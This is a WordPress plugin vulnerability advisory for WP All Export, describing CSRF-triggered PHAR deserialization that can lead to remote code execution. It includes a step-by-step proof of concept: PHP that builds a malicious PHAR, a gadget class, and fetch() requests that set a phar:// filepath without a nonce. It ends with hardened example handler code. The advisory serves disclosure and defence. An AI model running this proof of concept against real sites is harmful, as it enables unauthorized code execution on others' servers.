WordPress Plugin Vulnerabilities
WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF
Description
The plugin does not check nonce tokens early enough in the request lifecycle: file operations on an attacker-controlled path run before the nonce is verified. An attacker who can place a file on the server (Author or higher, for example via an upload) can therefore make a logged-in user perform unwanted actions via CSRF that lead to PHAR deserialization of that file, which may lead to remote code execution.
Proof of Concept
1. Ensure your WordPress installation is using PHP version 7.4 or earlier. Since PHP 8.0, PHAR metadata is no longer unserialized automatically when a file is accessed through the `phar://` stream wrapper, so the trigger in step 5 does nothing on newer versions.

2. Create a `poc.phar` file using the following code, and place the resulting file in the root directory of the server. Creating PHAR archives requires `phar.readonly=0` (for example `php -d phar.readonly=0 gen.php`):

```php
<?php
class Evil {}
try {
    $pharFile = 'poc.phar';
    if (file_exists($pharFile)) {
        unlink($pharFile);
    }
    $phar = new Phar($pharFile);
    $phar->startBuffering();
    $phar->addFromString('test.txt', 'text');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    // The serialized Evil object is stored in the archive metadata; PHP <= 7.4
    // unserializes it as soon as any file operation touches phar://.../test.txt.
    $phar->setMetadata(new Evil());
    $phar->stopBuffering();
    echo "$pharFile successfully created" . PHP_EOL;
} catch (Exception $e) {
    echo $e->getMessage();
}
```

3. Add the following class to a file WordPress loads on every request (for example `wp-config.php`) to simulate a gadget:

```php
class Evil {
    function __wakeup() {
        die('Arbitrary deserialization');
    }
}
```

4. Run the following code in your browser's console, while logged in as a Super Admin, to create a new export and note its ID. Notice that no nonce is required, which is what lets a cross-site page issue the same request on the victim's behalf. Replace `/var/www/html` with the server's web root if needed:

```javascript
await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", {
  "credentials": "include",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants",
  "mode": "cors",
});
```

5. Run the following code in your browser, again as a Super Admin (and again without a nonce), replacing `ID` with the ID of the export created in the previous step, and see that the PHAR deserialization occurs by examining the response (the `Arbitrary deserialization` message from the gadget):

```javascript
await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=download&page=pmxe-admin-export&google_feed=1&id=ID", {
  "credentials": "include",
  "headers": {},
  "method": "GET",
  "mode": "cors",
});
```
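The PoC above works because the export handler touches the attacker-supplied `filepath` before any nonce check. The following is an added example, not code from WP All Export or from the advisory, showing a hypothetical admin-ajax handler with the two controls that close this class of bug: verifying the nonce (and capability) before reading any request parameter, and refusing any path that selects a stream wrapper or escapes the uploads directory. The action, nonce and function names (`pmxe_demo_save_export`, `pmxe_demo_nonce`, `pmxe_demo_resolve_upload_path`) are assumptions chosen for the example; the WordPress API calls (`check_ajax_referer`, `current_user_can`, `wp_get_upload_dir`, `wp_send_json_*`) are the real core functions.

```php
<?php
// Added example (not the plugin's own code): hardened admin-ajax handler.
// Hypothetical names: pmxe_demo_save_export, pmxe_demo_nonce, pmxe_demo_resolve_upload_path.

add_action( 'wp_ajax_pmxe_demo_save_export', 'pmxe_demo_save_export' );

function pmxe_demo_save_export() {
    // 1. Verify the nonce BEFORE touching any request parameter. check_ajax_referer()
    //    terminates the request on failure, so nothing below runs for a forged
    //    cross-site request, however the filepath is crafted.
    check_ajax_referer( 'pmxe_demo_nonce', '_wpnonce' );

    // 2. Capability check: a nonce only proves intent, not authorization.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $filepath = isset( $_POST['filepath'] ) ? wp_unslash( $_POST['filepath'] ) : '';
    $safe     = pmxe_demo_resolve_upload_path( $filepath );
    if ( false === $safe ) {
        wp_send_json_error( 'invalid path', 400 );
    }

    // Only now is it safe to run file operations on the path: the phar:// wrapper
    // is unreachable, so no PHAR metadata can be unserialized (PHP <= 7.4).
    wp_send_json_success( array( 'path' => $safe, 'exists' => file_exists( $safe ) ) );
}

/**
 * Accept only a plain filesystem path inside wp-content/uploads.
 * Returns the resolved path or false.
 *
 * Rejecting anything with a "scheme:" prefix (phar://, php://, data:, ...)
 * blocks the stream-wrapper trick used by the PoC even if a nonce check is
 * ever bypassed; the realpath() prefix test then enforces containment.
 */
function pmxe_demo_resolve_upload_path( $filepath ) {
    if ( ! is_string( $filepath ) || '' === $filepath ) {
        return false;
    }
    // Two or more scheme characters before ':' so a Windows drive letter ("C:")
    // still passes while every PHP stream wrapper name is rejected.
    if ( preg_match( '#^[a-z][a-z0-9+.-]+:#i', $filepath ) ) {
        return false;
    }
    $uploads = wp_get_upload_dir();
    $base    = realpath( $uploads['basedir'] );
    $real    = realpath( $filepath );
    if ( false === $base || false === $real ) {
        return false;
    }
    // realpath() has already resolved ".." and symlinks, so a prefix check suffices.
    if ( 0 !== strpos( $real, $base . DIRECTORY_SEPARATOR ) ) {
        return false;
    }
    return $real;
}
```

On the client side the corresponding request must carry `_wpnonce=<value of wp_create_nonce('pmxe_demo_nonce')>` (typically exposed via `wp_localize_script()`); the `fetch()` calls in the PoC would then fail at `check_ajax_referer()` before `filepath` is ever read. The ordering is the point of the advisory: the same nonce check placed after the file operations would still leave the PHAR trigger reachable.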
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-21
Added
2023-11-21
Last Updated
2023-11-21